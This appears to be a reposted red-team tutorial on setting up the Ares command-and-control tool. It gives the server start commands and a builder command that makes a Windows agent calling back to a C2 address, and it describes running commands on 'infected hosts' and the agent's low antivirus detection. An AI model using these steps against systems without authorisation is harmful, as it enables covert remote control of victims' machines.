Home Internet of things Command and Control – Web Interface

Command and Control – Web Interface

534
0


and  



The high demand of Red Team assessments has increased the interest of security companies and consultants to develop command and control tools with different capabilities. Some of these tools can be used and in official engagements while some others have been developed only for research purposes.

Ares is a command and control tool which is written in Python and it was developed by Kevin Locati. It has a web interface which runs on port 8080 and it is password and passphrase protected. The database must be created in advance of running the server.

./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ares - Server  - ares server - Command and Control – Web Interface

Ares – Server

Ares - Password Setup  - ares password setup - Command and Control – Web Interface

Ares – Password Setup

Once the password is set Ares will ask for a Passphrase to be used.

Ares - Passphrase  - ares passphrase - Command and Control – Web Interface

Ares – Passphrase

The main interface of Ares contains only three functions:

  1. Agent List
  2. Change Password
  3. Disconnect

The Agent List is the page of where all the infected hosts running the implant will appear.

Ares - Main Interface  - ares main interface - Command and Control – Web Interface

Ares – Main Interface

The config.py in the agent folder controls the settings of the agent. Before anything else the SERVER variable must be changed to the IP address that the command and control server is running.

Ares - Agent Configuration  - ares agent configuration - Command and Control – Web Interface

Ares – Agent Configuration

If wine is installed (Ares repository contains wine setup script) then the agent can be built in an executable format by running the following command:

./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Ares - Creating Agent  - ares creating agent - Command and Control – Web Interface

Ares – Creating Agent

Hosts that are running the agent will appear on the agent list in the following format.

Ares - List of Agents  - ares list of agents - Command and Control – Web Interface

Ares – List of Agents

Commands can be executed on the target hosts from a field and the output will be retrieved in a console window.

Ares - Command Execution - ipconfig  - ares command execution ipconfig - Command and Control – Web Interface

Ares – Command Execution – ipconfig

Ares - Command Execution - List of Users  - ares command execution list of users - Command and Control – Web Interface

Ares – Command Execution – List of Users

Ares except of some basic command execution on the target host doesn’t offer other capabilities. However the agent has at the time being low detection rate against a number of antivirus.

Agent - Detection Rate  - agent detection rate - Command and Control – Web Interface

Agent – Detection Rate





Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here